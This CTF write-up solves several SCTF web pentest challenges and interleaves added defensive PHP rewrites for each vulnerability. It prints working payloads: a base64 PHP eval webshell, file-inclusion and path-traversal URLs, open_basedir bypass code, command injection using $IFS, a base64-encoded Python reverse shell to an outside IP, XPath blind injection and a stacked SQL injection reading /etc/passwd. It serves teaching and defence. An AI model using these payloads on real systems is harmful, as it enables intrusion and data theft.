The path of painful penetration
0x00 Preface
This CTF was rough. There were 7 web pentest challenges, and that is where the pain began. Code audit is fine; why add so many high barriers?
0x01 Pentest-homework-200
http://homework.sctf.xctf.org.cn/
Opening the page shows a login/registration form: name, age, and an image upload.
After logging in, an image is displayed, along with a link to homework.
Clicking the homework link gives a URL that includes a page:
http://homework.sctf.xctf.org.cn/homework.php?homework=homework.txt
Clearly this is a file inclusion vulnerability. Try uploading an image webshell and including it.
Inevitably, the include fails.
Read the source to see what the upload function does.
http://homework.sctf.xctf.org.cn/homework.php?homework=php://filter/convert.base64-encode/resource=index.php
Read successful. Dump all the source the same way.
Audit the upload code:
```php
if(isset($_POST['upload'])){
    $filename = $_FILES['uploaded']['name'];
    $filetype = $_FILES['uploaded']['type'];
    $filesize = $_FILES['uploaded']['size'];
    $tmpname  = $_FILES['uploaded']['tmp_name'];
    $uploaddir = './upload/';
    $target_path = $uploaddir.basename($filename);
    $fileext = substr(strrchr($filename,"."),1);
    if(($fileext == 'gif')&&($filetype == "image/gif")){
        {
            if(move_uploaded_file($tmpname,$target_path)) { }
        }
        $im = imagecreatefromgif($target_path);
        srand(time());
        $newfilename = strval(rand()).".gif";
        $newimagepath = $uploaddir.$newfilename;
        imagegif($im,$newimagepath);
        unlink($target_path);
    }else if(($fileext == 'jpg')&&($filetype == "image/jpeg")){
        ...
```
Interesting: uploaded images are re-processed by functions such as imagecreatefromgif.
But that's not the point. The point is the earlier move_uploaded_file($tmpname,$target_path).
Anyone familiar with PHP will see it: at that moment the image has already been uploaded successfully.
Only after the upload is the image processed and the original deleted with unlink($target_path);
So this challenge is a race: network speed and luck.
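The defender's side of that race, as an added example that is not the challenge's code: the GIF branch rewritten so the raw upload never lands under the web root (it is decoded straight from PHP's temp file) and the output name comes from a CSPRNG. The function name, the upload directory and PHP 7.1+ (random_bytes, nullable return types) are assumptions.

```php
<?php
// Added example (not the challenge's upload code). The original file is
// processed from PHP's own temp location, so there is no moment at which
// it is reachable through the web server or the include.
function handle_gif_upload(array $file, string $uploaddir): ?string
{
    // Only accept what PHP itself received as an upload.
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Trust the bytes, not the client-supplied name or Content-Type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== IMAGETYPE_GIF) {
        return null;
    }
    // Decode directly from the temp file; nothing is moved into ./upload/ first.
    $im = @imagecreatefromgif($file['tmp_name']);
    if ($im === false) {
        return null;
    }
    // Unpredictable name instead of srand(time()) + rand().
    $newfilename  = bin2hex(random_bytes(16)) . '.gif';
    $newimagepath = rtrim($uploaddir, '/') . '/' . $newfilename;
    // Re-encoding writes a fresh byte stream; the original's comment and
    // extension blocks are not copied over.
    $ok = imagegif($im, $newimagepath);
    imagedestroy($im);
    // Discard the original; only the re-encoded copy ever exists on disk.
    @unlink($file['tmp_name']);
    return $ok ? $newfilename : null;
}

if (isset($_POST['upload'], $_FILES['uploaded'])) {
    $saved = handle_gif_upload($_FILES['uploaded'], './upload/');
    echo $saved === null ? 'upload rejected' : 'saved as ' . $saved;
}
```

This only closes the race; the include in homework.php still needs its own whitelist, otherwise even a clean GIF can be included as PHP.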
Upload an image that writes the shell:
```php
fputs(fopen(base64_decode(dmlyLnBocA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWyd2aXJpbmsnXSk7Pz4tLS0t));
```
Hammer it with multithreaded Burp requests on
http://homework.sctf.xctf.org.cn/homework.php?homework=upload/virink.jpg
With a bit of luck it succeeds quickly.
Later I found the shell kept disappearing; clearly someone was messing with it, so I wrote to /tmp instead. 2333333
The webshell was up, but many functions were disabled:
```ini
disable_functions= passthru,exec,phpinfo,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,pcntl_exec
```
Then use the PHP open_basedir bypass trick to list directories:
```php
virink=printf('<b>open_basedir : %s </b><br />', ini_get('open_basedir'));
$file_list = array();
$it = new DirectoryIterator("glob:home/wwwroot/default/web/*");
foreach($it as $f) { $file_list[] = $f->__toString(); }
$it = new DirectoryIterator("glob:///.*");
foreach($it as $f) { $file_list[] = $f->__toString(); }
sort($file_list);
foreach($file_list as $f){ echo "{$f}<br/>"; }
```
Then read the flag
```php
virink=echo file_get_contents('/home/wwwroot/default/web/4ff692fb12aa996e27f0a108bfc386c2');
```
SCTF{g00d_Good_Stu6y}
0x02 Pentest-sycshell-200
Right click to view the source code
<!-- Internal system data: http://sycshell.sycsec.com:61180/ -->
Add a hosts entry and access it by domain name.
Then view the source, decode the JSFuck, and get
/W0Ca1N1CaiBuDa0/read.php?f=index
Code audit: a file inclusion.
Source code:
```php
<?php
show_source(__FILE__);
$pass = @$_GET['pass'];
$a = "syclover";
strlen($pass) > 15 ? die("Don't Hack me!") : "";
if(!is_numeric($pass) || preg_match('/0(x)?|-|\+|\s|^(\.|\d).*$/i',$pass)){
    die('error');
}
if($pass == 1 && $a[$pass] === "s"){
    $file = isset($_GET['f']) ? $_GET['f'].'.php' : 'index.php';
    @include $file;
}
?>
```
There's a twist!!!!! It's version-dependent.
The hint (sycshell_tip): audit carefully, and take a good look at PHP's underlying source. For convenience: 58.213.63.27:61180/phpinfo.php
From that, the PHP version is 5.3.29.
Version quirk: %0b (\v) is not matched by the \s in the regex, so it gets past it.
/?pass=%0b.1e1
PHP's underlying source:
```c
while (*str == ' ' || *str == '\t' || *str == '\n' || *str == '\r' || *str == '\v' || *str == '\f') { str++; length--; }
```
The other twist in this challenge is phpinfo() + LFI.
Then it's just brute-forcing, 2333
The $pass bypass twist is similar to a challenge by phithon:
https://www.leavesongs.com/PENETRATION/some-sangebaimao-ctf-writeups.html?lan=tw&lan=tw&lan=tw
Question 3 there: PHP types and logic + fuzzing, and function quirks found in source code audit leading to a bypass.
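The same gate rewritten defensively, as an added example that is not the challenge's read.php: the numeric check only accepts the canonical form (so a leading %0b or an exponent form is rejected before any loose comparison runs), and the include goes through a fixed map instead of concatenating $_GET['f']. The page map and PHP 7 are assumptions.

```php
<?php
// Added example (not the challenge's code): strict gate for sycshell's read.php.
declare(strict_types=1);

function is_canonical_one(string $pass): bool
{
    // ctype_digit() accepts only ASCII 0-9: no sign, no dot, no exponent and
    // no leading whitespace of any kind, so "\v.1e1" never reaches the
    // comparison. The comparison itself is a string comparison, so the
    // loose numeric "\v.1e1" == 1 is never evaluated.
    return ctype_digit($pass) && $pass === '1';
}

function resolve_page(?string $f): ?string
{
    // Request names map to files; user input is never part of a path.
    // The allowed pages are an assumption for this example.
    $pages = ['index' => 'index.php', 'about' => 'about.php'];
    if ($f === null) {
        return 'index.php';
    }
    return $pages[$f] ?? null;
}

$pass = isset($_GET['pass']) ? (string)$_GET['pass'] : '';
if (!is_canonical_one($pass)) {
    die('error');
}
$file = resolve_page(isset($_GET['f']) ? (string)$_GET['f'] : null);
if ($file === null) {
    die('unknown page');
}
include __DIR__ . '/' . $file;
```

With a fixed map, the phpinfo() + LFI trick above has nothing to include: there is no path to point at the temp file.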
0x03 Pentest-DrugMarket1-300
Drug Market: http://www.spentest.com/
It starts with a twist: a fake 404 Not Found page. I've been burned by this before, so I quietly viewed the source and followed the hidden link.
http://drug.spentest.com/
Clicking order submits data; there is no other functionality. XSS may exist.
I continued to look at the source code and found a link.
http://msgboard.spentest.com/
Open the page and jump directly to
http://msgboard.spentest.com/index.php?action=login.php
Obviously a file inclusion vulnerability. After looking around, there is nowhere to upload.
Then study the page's functionality. After logging in as a customer with an arbitrary username and contact info, there is a session, and the username and contact fields are not filtered.
Initial judgement: include the session file. Out of habit I tried /tmp/sess_xxxxxxxxx; it doesn't exist, so the save path must have been changed.
To find where sessions are stored, first read the Apache configuration file:
http://msgboard.spentest.com/index.php?action=../../../../../../../../etc/httpd/conf/httpd.conf
which gives:
```apache
<VirtualHost 0.0.0.0:80>
    ServerAdmin Syclover
    DocumentRoot /var/www/html
    <Directory "/var/www/html">
        AssignUserId apache apache
        php_value session.save_path "/var/lib/php/session"
    </Directory>
</VirtualHost>
<VirtualHost 0.0.0.0:80>
    ServerAdmin Syclover
    ServerName www.spentest.com
    DocumentRoot /var/www/webhosts/www
    <Directory "/var/www/webhosts/www">
        AssignUserId www www
        php_value session.save_path "/var/lib/php/session_www"
    </Directory>
</VirtualHost>
<VirtualHost 0.0.0.0:80>
    ServerAdmin Syclover
    ServerName drug.spentest.com
    DocumentRoot /var/www/webhosts/drug
    <Directory "/var/www/webhosts/drug">
        AssignUserId drug drug
        php_value session.save_path "/var/lib/php/session_drug"
    </Directory>
</VirtualHost>
<VirtualHost 0.0.0.0:80>
    ServerAdmin Syclover
    ServerName msgboard.spentest.com
    DocumentRoot /var/www/webhosts/msgboard
    <Directory "/var/www/webhosts/msgboard">
        AssignUserId msgboard msgboard
        php_value session.save_path "/var/lib/php/session_msgboard"
    </Directory>
</VirtualHost>
```
So the session storage path is /var/lib/php/session_msgboard.
Write PHP into Username or Contact, then include the session file:
http://msgboard.spentest.com/index.php?action=../../../../../../../../var/lib/php/session_msgboard/sess_rb2rbfrie8rku2n81dq52vghp0
Then further information gathering:
```php
virink=phpinfo()
```
which gives:
```ini
disable_functions=passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server
```
The other sites are not readable. I quietly read this site's source and got the database connection info.
Since this challenge had already been taken by others (FB), I quietly collected what my predecessors left behind. The /tmp directory is my favourite... 23333
After wading through a lot of junk I found some useful things too, such as the MySQL root password. 23333
At the time I was careless and didn't save it; after /tmp was inexplicably wiped, I couldn't find the MySQL information again.
My train of thought broke there, and I still couldn't figure out how to execute commands.
Re-reading the hints:
This is a penetration challenge, so don't be limited to your current shell; find a way to penetrate the drug site. To make the challenge closer to a real environment, the firewall rules are stricter.
So I went back to XSS, because I had seen the drug database and there was no administrator user table.
XSS through the order form went nowhere. Then, with a teammate's hint, I put the XSS into adminconfig instead and got the cookie!
On the admin page there is an image download function. I had my server listen on a port and made the target fetch from it, but nothing came. With a teammate's hint I listened on port 80 instead; hint 2 was exactly this twist.
Then a wget request arrives.
Evidently a command execution vulnerability.
Trick: $IFS instead of spaces.
Upload a reverse-shell Python script:
```php
virink=fputs(fopen('/tmp/vvv.py',w),base64_decode(aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zDQpzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0Kcy5jb25uZWN0KCgiNDUuNzguMTMuMjMiLDgwKSkNCm9zLmR1cDIocy5maWxlbm8oKSwwKQ0Kb3MuZHVwMihzLmZpbGVubygpLDEpDQpvcy5kdXAyKHMuZmlsZW5vKCksMikNCnA9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9iYXNoIiwiLWkiXSk7DQo));
```
Then execute the command:
```
http://vvv/flag.jpg;python$IFS/tmp/vvv.py
```
Successfully got a bash shell.
Finally, flag1.txt is in /home/drug:
SCTF{b68181af58bdf261714942f0d1a823be}
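A hardened version of the admin image-download feature, added here and not the drug site's code (its source is not shown above): the URL is fetched with the curl extension instead of being dropped into a wget command line, so ; and $IFS in the URL never reach a shell, and the target host must be on an allow-list so the server cannot be pointed at arbitrary hosts. fetch_image, the host list, the destination directory and PHP 7.1+ are assumptions.

```php
<?php
// Added example (not the drug site's code): no shell is ever spawned, so the
// URL cannot carry a second command.
function fetch_image(string $url, string $destdir, array $allowed_hosts): ?string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    // Only plain http(s) to allow-listed hosts: no file://, gopher://, and no
    // fetching from internal addresses.
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)
        || !in_array(strtolower($p['host']), $allowed_hosts, true)) {
        return null;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,              // no redirect to other hosts
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $body = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if ($body === false || $code !== 200 || strlen($body) > 5 * 1024 * 1024) {
        return null;
    }
    // Validate by content, not by the ".jpg" at the end of the URL.
    $info = @getimagesizefromstring($body);
    if ($info === false
        || !in_array($info[2], [IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_GIF], true)) {
        return null;
    }
    // Server-chosen name and extension; the remote name is never reused.
    $name = bin2hex(random_bytes(16)) . image_type_to_extension($info[2]);
    $path = rtrim($destdir, '/') . '/' . $name;
    return file_put_contents($path, $body) === false ? null : $name;
}

// Usage; the directory and allowed host are placeholders for this example.
$saved = fetch_image($_GET['url'] ?? '', '/path/to/images', ['images.example.com']);
echo $saved === null ? 'download rejected' : 'saved as ' . $saved;
```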
0x04 Pentest-ETO-200
This was the first challenge released, but I only finished it at the end.
A quick test shows injection.
Then every kind of injection failed.
The official tips are wonderful:
There's no need to try to brute-force ETO. Besides, the hint has been there all along.
I never found where the hint was, from start to finish.
Only after finishing the injection did I notice that when an error occurs, a hint is returned in the response header: //user[id=1]
The setter's imagination gets 101 points out of 100; the extra point is pure fatherly love.
With a teammate's hint I realised this was XPath injection.
Quotes are filtered, but official hint 2 says to make good use of the characters that are already there.
That is, every character of the password occurs in username, email and role, so you can compare character by character with substring():
http://eto.sctf.xctf.org.cn/?action=user&id=1 and substring(//user[1]/username,1,1)=substring(//user[1]/password,1,1)
Another round of brute-forcing with the trusty Burp.
Finally the 32-character password comes out: Ywj@4791.d_gToWDmceu.Eali0s2yarn
Log in and you get the flag:
SCTF{0f61ce4eb984a4a6d3aaa31f779533df}
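The ETO user lookup done safely, as an added example that is not the challenge's code: id must be a canonical integer before it reaches the XPath expression (so "1 and substring(...)" is rejected whole), and any string value is wrapped by a concat()-based literal builder, since XPath 1.0 has no escape sequence for quotes. The XML document, DOMXPath usage and function names are constructed for this example.

```php
<?php
// Added example (not ETO's code): safe XPath lookups with DOMXPath.

// Build an XPath 1.0 string literal for an arbitrary value. A value that
// contains both quote kinds is split on ' and reassembled with concat().
function xpath_literal(string $s): string
{
    if (strpos($s, "'") === false) {
        return "'" . $s . "'";
    }
    if (strpos($s, '"') === false) {
        return '"' . $s . '"';
    }
    $parts = array_map(function ($p) { return "'" . $p . "'"; }, explode("'", $s));
    return 'concat(' . implode(', "\'", ', $parts) . ')';
}

function find_username(DOMXPath $xp, string $id): ?string
{
    // The whole request value must be digits; anything else never becomes XPath.
    if (!ctype_digit($id)) {
        return null;
    }
    $nodes = $xp->query('//user[id=' . $id . ']/username');
    return $nodes->length === 1 ? $nodes->item(0)->textContent : null;
}

function find_role(DOMXPath $xp, string $username): ?string
{
    $nodes = $xp->query('//user[username=' . xpath_literal($username) . ']/role');
    return $nodes->length === 1 ? $nodes->item(0)->textContent : null;
}

// Constructed sample document for the example.
$xml = '<users><user><id>1</id><username>alice</username><role>admin</role></user></users>';
$doc = new DOMDocument();
$doc->loadXML($xml);
$xp = new DOMXPath($doc);

var_dump(find_username($xp, '1'));
var_dump(find_username($xp, '1 and substring(//user[1]/password,1,1)="Y"'));
var_dump(find_role($xp, "o'brien\" or \"\"=\""));
```

The second and third calls return NULL without ever building a malformed or widened expression, which is the property the blind substring() comparison above depends on being absent.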
0x05 Pentest-hackme-300 (unsolved)
http://hackme.sctf.xctf.org.cn
Dragged it out and still couldn't do it; injection again. Injection has always been my weak point. Orz
According to the official hints:
1. Website developers often read memos.
2. Try to get the administrator password.
3. Pay attention to the database connection mode.
4. XSS
And a teammate's hint: PDO injection.
A Baidu search: with a PDO database connection, an INSERT can be injected.
After some fiddling I built one:
http://hackme.sctf.xctf.org.cn/index.php?id=0;/*!50000insert*//*!50000into*/beiwanglu(id,time,event)/*!50000values*/(9,'virink',/*!50000select*/(/*!50000hex*/(/*!50000load_file*/(0x2F6574632F706173737764))));%23
Successfully XSS'd the administrator's cookie...
Then, following the hint, try to get the administrator password; presumably the next step is hijacking the login form to capture it.
But I don't know how.
XSS is more difficult than SQL injection ~~Orz
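The memo lookup with PDO configured defensively, as an added example that is not hackme's code: stacked statements are refused at connection time, the id is bound as a parameter, and the stored event text is escaped when rendered, which is the missing step the stored XSS above relied on. DSN, credentials and function names are assumptions; the table and columns beiwanglu(id,time,event) are the ones visible in the payload above.

```php
<?php
// Added example (not hackme's code): PDO/MySQL without stacked queries.
function connect_pdo(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        // Real server-side prepares: statement text is fixed before any value
        // is sent, so a value can never be parsed as SQL.
        PDO::ATTR_EMULATE_PREPARES => false,
        // Refuse "...; INSERT INTO ..." on this connection (PHP >= 5.5.21 / 5.6.5).
        PDO::MYSQL_ATTR_MULTI_STATEMENTS => false,
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ]);
}

function memo_by_id(PDO $db, string $id): ?array
{
    // "0;/*!50000insert*/..." is not an integer: rejected before any query.
    if (!ctype_digit($id)) {
        return null;
    }
    $st = $db->prepare('SELECT id, time, event FROM beiwanglu WHERE id = :id');
    $st->bindValue(':id', (int)$id, PDO::PARAM_INT);
    $st->execute();
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The event column is user-controlled, so it is escaped on output; the memo
// page the developers read must never emit it raw.
function render_event(?array $memo): string
{
    return $memo === null ? '' : htmlspecialchars($memo['event'], ENT_QUOTES, 'UTF-8');
}

// Usage; DSN and credentials are placeholders for this example.
$db = connect_pdo('mysql:host=127.0.0.1;dbname=hackme;charset=utf8mb4', 'app', 'secret');
echo render_event(memo_by_id($db, $_GET['id'] ?? ''));
```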
0x06 Afterword
In the end the CTF finished with 910 points: 0x01 to 0x04 plus 10 points.
My imagination still isn't wide enough and I have too little experience. And I'm slow. At many key and non-key points I fell into mental traps. Without my teammates' hints I'd probably only have the 10 sign-in points.